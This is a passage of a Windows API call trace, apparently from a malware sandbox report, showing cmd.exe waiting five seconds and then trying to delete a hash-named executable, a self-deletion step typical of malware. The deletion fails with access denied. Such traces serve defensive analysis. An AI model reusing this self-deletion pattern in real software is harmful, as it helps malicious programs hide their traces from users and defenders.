_wcsicmp (_String1="timeout", _String2="IF") returned 11 [0238.093] _wcsicmp (_String1="timeout", _String2="REM") returned 2 [0238.094] GetProcessHeap () returned 0x7b0000 [0238.094] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x210) returned 0x7b9338 [0238.094] GetProcessHeap () returned 0x7b0000 [0238.094] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x26) returned 0x7b9550 [0238.094] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17 [0238.095] GetProcessHeap () returned 0x7b0000 [0238.095] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x418) returned 0x7b05c8 [0238.095] SetErrorMode (uMode=0x0) returned 0x0 [0238.095] SetErrorMode (uMode=0x1) returned 0x0 [0238.095] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7b05d0, lpFilePart=0x19f51c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f51c*="Desktop") returned 0x1d [0238.095] SetErrorMode (uMode=0x0) returned 0x1 [0238.095] GetProcessHeap () returned 0x7b0000 [0238.095] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7b05c8, Size=0x54) returned 0x7b05c8 [0238.095] GetProcessHeap () returned 0x7b0000 [0238.095] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7b05c8) returned 0x54 [0238.095] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x9df4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0238.096] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0238.096] GetProcessHeap () returned 0x7b0000 [0238.096] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x110) returned 0x7b0628 [0238.096] GetProcessHeap () returned 0x7b0000 [0238.096] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x218) returned 0x7b0740 [0238.105] GetProcessHeap () returned 0x7b0000 [0238.105] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7b0740, Size=0x112) returned 0x7b0740 [0238.105] GetProcessHeap () returned 0x7b0000 [0238.105] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7b0740) returned 0x112 [0238.105] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x9df4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0238.105] GetProcessHeap () returned 0x7b0000 [0238.105] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xe0) returned 0x7b0860 [0238.108] GetProcessHeap () returned 0x7b0000 [0238.108] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7b0860, Size=0x76) returned 0x7b0860 [0238.108] GetProcessHeap () returned 0x7b0000 [0238.108] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7b0860) returned 0x76 [0238.110] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0238.110] GetLastError () returned 0x2 [0238.110] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x7b9580 [0238.111] GetProcessHeap () returned 0x7b0000 [0238.111] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x14) returned 0x7b7b90 [0238.111] FindClose (in: hFindFile=0x7b9580 | out: hFindFile=0x7b9580) returned 1 [0238.111] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0238.111] GetLastError () returned 0x2 [0238.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x7b9580 [0238.112] GetProcessHeap () returned 0x7b0000 [0238.112] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7b7b90, Size=0x4) returned 0x7b7568 [0238.112] FindClose (in: hFindFile=0x7b9580 | out: hFindFile=0x7b9580) returned 1 [0238.112] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0238.112] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0238.112] GetConsoleTitleW (in: lpConsoleTitle=0x19f79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0238.189] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f6c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f6ac | out: lpAttributeList=0x19f6c8, lpSize=0x19f6ac) returned 1 [0238.189] UpdateProcThreadAttribute (in: lpAttributeList=0x19f6c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f6b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f6c8, lpPreviousValue=0x0) returned 1 [0238.189] GetStartupInfoW (in: lpStartupInfo=0x19f700 | out: lpStartupInfo=0x19f700*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0238.189] GetProcessHeap () returned 0x7b0000 [0238.189] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7b7ad0 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0238.189] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0238.190] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0238.191] GetProcessHeap () returned 0x7b0000 [0238.191] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b7ad0) returned 1 [0238.191] GetProcessHeap () returned 0x7b0000 [0238.191] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xa) returned 0x7b9580 [0238.191] lstrcmpW (lpString1="\\timeout.exe", lpString2="\\XCOPY.EXE") returned -1 [0238.195] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\timeout.exe", lpCommandLine="timeout /t 5 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f650*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="timeout /t 5 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f69c | out: lpCommandLine="timeout /t 5 ", lpProcessInformation=0x19f69c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x4b4, dwThreadId=0x13cc)) returned 1 [0238.971] CloseHandle (hObject=0xa4) returned 1 [0238.971] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0238.971] GetProcessHeap () returned 0x7b0000 [0238.971] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7bac48) returned 1 [0238.972] GetEnvironmentStringsW () returned 0x7ba118* [0238.972] GetProcessHeap () returned 0x7b0000 [0238.972] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb28) returned 0x7bac48 [0238.972] FreeEnvironmentStringsA (penv="=") returned 1 [0238.972] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0246.195] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f634 | out: lpExitCode=0x19f634*=0x0) returned 1 [0246.196] CloseHandle (hObject=0xa8) returned 1 [0246.196] _vsnwprintf (in: _Buffer=0x19f71c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f63c | out: _Buffer="00000000") returned 8 [0246.196] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0246.196] GetProcessHeap () returned 0x7b0000 [0246.196] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7bac48) returned 1 [0246.196] GetEnvironmentStringsW () returned 0x7ba118* [0246.196] GetProcessHeap () returned 0x7b0000 [0246.196] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb4e) returned 0x7bc2d0 [0246.196] FreeEnvironmentStringsA (penv="=") returned 1 [0246.197] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0246.197] GetProcessHeap () returned 0x7b0000 [0246.197] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7bc2d0) returned 1 [0246.197] GetEnvironmentStringsW () returned 0x7ba118* [0246.197] GetProcessHeap () returned 0x7b0000 [0246.197] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb4e) returned 0x7bc2d0 [0246.197] FreeEnvironmentStringsA (penv="=") returned 1 [0246.197] GetProcessHeap () returned 0x7b0000 [0246.197] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b9580) returned 1 [0246.197] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f6c8 | out: lpAttributeList=0x19f6c8) [0246.197] GetConsoleTitleW (in: lpConsoleTitle=0x19f9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0246.271] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0246.271] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0246.271] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0246.271] GetProcessHeap () returned 0x7b0000 [0246.272] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x1bc) returned 0x7b0a10 [0246.272] GetProcessHeap () returned 0x7b0000 [0246.272] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7b0a10, Size=0xe4) returned 0x7b0a10 [0246.272] GetProcessHeap () returned 0x7b0000 [0246.272] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7b0a10) returned 0xe4 [0246.273] GetProcessHeap () returned 0x7b0000 [0246.273] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xea) returned 0x7b0b00 [0246.273] GetProcessHeap () returned 0x7b0000 [0246.273] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x1bc) returned 0x7b0d80 [0246.273] GetProcessHeap () returned 0x7b0000 [0246.273] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7b0d80, Size=0xe4) returned 0x7b0d80 [0246.273] GetProcessHeap () returned 0x7b0000 [0246.273] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7b0d80) returned 0xe4 [0246.273] GetProcessHeap () returned 0x7b0000 [0246.273] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xce) returned 0x7b0e70 [0246.273] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f758 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0246.273] GetProcessHeap () returned 0x7b0000 [0246.273] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x38) returned 0x7b95b0 [0246.273] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e7c8 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0246.273] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19e9fc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19ea00, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19e9fc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0246.274] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0246.274] GetProcessHeap () returned 0x7b0000 [0246.274] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x2c) returned 0x7b95f0 [0246.274] GetProcessHeap () returned 0x7b0000 [0246.274] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x258) returned 0x7b82a8 [0246.274] _wcsicmp (_String1="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", _String2=".") returned 11 [0246.274] _wcsicmp (_String1="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", _String2="..") returned 11 [0246.274] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x20 [0246.274] GetProcessHeap () returned 0x7b0000 [0246.274] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x210) returned 0x7b8508 [0246.274] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7b8510 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0246.274] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", nBufferLength=0x104, lpBuffer=0x19ee28, lpFilePart=0x19edfc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", lpFilePart=0x19edfc*="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x62 [0246.274] SetErrorMode (uMode=0x0) returned 0x1 [0246.274] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0246.274] GetProcessHeap () returned 0x7b0000 [0246.275] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x258) returned 0x7b8720 [0246.275] _wcsicmp (_String1="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", _String2=".") returned 11 [0246.275] _wcsicmp (_String1="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", _String2="..") returned 11 [0246.275] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x20 [0246.275] GetProcessHeap () returned 0x7b0000 [0246.275] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x92) returned 0x7b0f48 [0246.275] GetProcessHeap () returned 0x7b0000 [0246.275] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x44) returned 0x7b0fe8 [0246.275] GetProcessHeap () returned 0x7b0000 [0246.275] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x44) returned 0x7b1038 [0246.275] GetProcessHeap () returned 0x7b0000 [0246.275] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7ba118 [0246.275] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", fInfoLevelId=0x0, lpFindFileData=0x7ba124, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7ba124) returned 0x7b8980 [0246.275] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0246.275] NtOpenFile (in: FileHandle=0x19ecfc, DesiredAccess=0x10000, ObjectAttributes=0x19ecc4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ecec, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x19ecfc*=0x0, IoStatusBlock=0x19ecec*(Status=0x106, Pointer=0x106, Information=0x19f6e8)) returned 0xc0000121 [0246.276] RtlReleaseRelativeName () returned 0x19ecdc [0246.276] RtlFreeAnsiString (AnsiString="\\") [0246.276] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0 [0246.276] GetLastError () returned 0x5 [0246.276] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0246.276] NtOpenFile (in: FileHandle=0x19ecfc, DesiredAccess=0x10000, ObjectAttributes=0x19ecc4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\977A8D~1.EXE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ecec, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x19ecfc*=0x0, IoStatusBlock=0x19ecec*(Status=0x106, Pointer=0x106, Information=0x19f6e8)) returned 0xc0000121 [0246.276] RtlReleaseRelativeName () returned 0x19ecdc [0246.276] RtlFreeAnsiString (AnsiString="\\") [0246.276] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977A8D~1.EXE" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d~1.exe")) returned 0 [0246.277] GetLastError () returned 0x5 [0246.277] _vsnwprintf (in: _Buffer=0x9e7940, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x19ed04 | out: _Buffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\r\n") returned 100 [0246.277] _get_osfhandle (_FileHandle=1) returned 0x3c [0246.277] GetFileType (hFile=0x3c) returned 0x2 [0246.277] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0246.277] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19ecdc | out: lpMode=0x19ecdc) returned 1 [0246.359] _get_osfhandle (_FileHandle=1) returned 0x3c [0246.359] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x9e7940*, nNumberOfCharsToWrite=0x64, lpNumberOfCharsWritten=0x19ecf4, lpReserved=0x0 | out: lpBuffer=0x9e7940*, lpNumberOfCharsWritten=0x19ecf4*=0x64) returned 1 [0246.445] _get_osfhandle (_FileHandle=2) returned 0x40 [0246.445] GetFileType (hFile=0x40) returned 0x2 [0246.445] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0246.445] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x19ec6c | out: lpMode=0x19ec6c) returned 1 [0246.520] _get_osfhandle (_FileHandle=2) returned 0x40 [0246.520] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x40, lpConsoleScreenBufferInfo=0x19ecbc | out: lpConsoleScreenBufferInfo=0x19ecbc) returned 1 [0246.596] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x9e7940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0247.314] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x9e7940, nSize=0x2000, Arguments=0x19ecec | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0247.314] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x9e7940*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x19eca0, lpReserved=0x0 | out: lpBuffer=0x9e7940*, lpNumberOfCharsWritten=0x19eca0*=0x13) returned 1 [0247.388] FindNextFileW (in: hFindFile=0x7b8980, lpFindFileData=0x7ba124 | out: lpFindFileData=0x7ba124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d48c780, ftCreationTime.dwHighDateTime=0x1d7a8a8, ftLastAccessTime.dwLowDateTime=0x1d48c780, ftLastAccessTime.dwHighDateTime=0x1d7a8a8, ftLastWriteTime.dwLowDateTime=0xf5049d00, ftLastWriteTime.dwHighDateTime=0x1d7a896, nFileSizeHigh=0x0, nFileSizeLow=0x729e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", cAlternateFileName="977A8D~1.EXE")) returned 0 [0247.389] GetLastError () returned 0x12 [0247.389] FindClose (in: hFindFile=0x7b8980 | out: hFindFile=0x7b8980) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7ba118) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b1038) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b0f48) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b0fe8) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b8720) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b8508) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b82a8) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b95f0) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b95b0) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b0e70) returned 1 [0247.389] GetProcessHeap () returned 0x7b0000 [0247.389] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7b0d80) returned 1 [0247.389] GetConsoleTitleW (in: lpConsoleTitle=0x19f9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0247.596] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0247.596] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0247.596] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0247.596] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0247.596] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0247.596] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0247.596] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0247.596] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0247.596] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0247.596] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0247.596] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0247.596] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0247.596] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0247.596] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0247.596] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0247.596] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0247.596] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0247.596] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0247.596] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0247.596] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0247.596] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0247.596] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0247.596] _wcsicmp 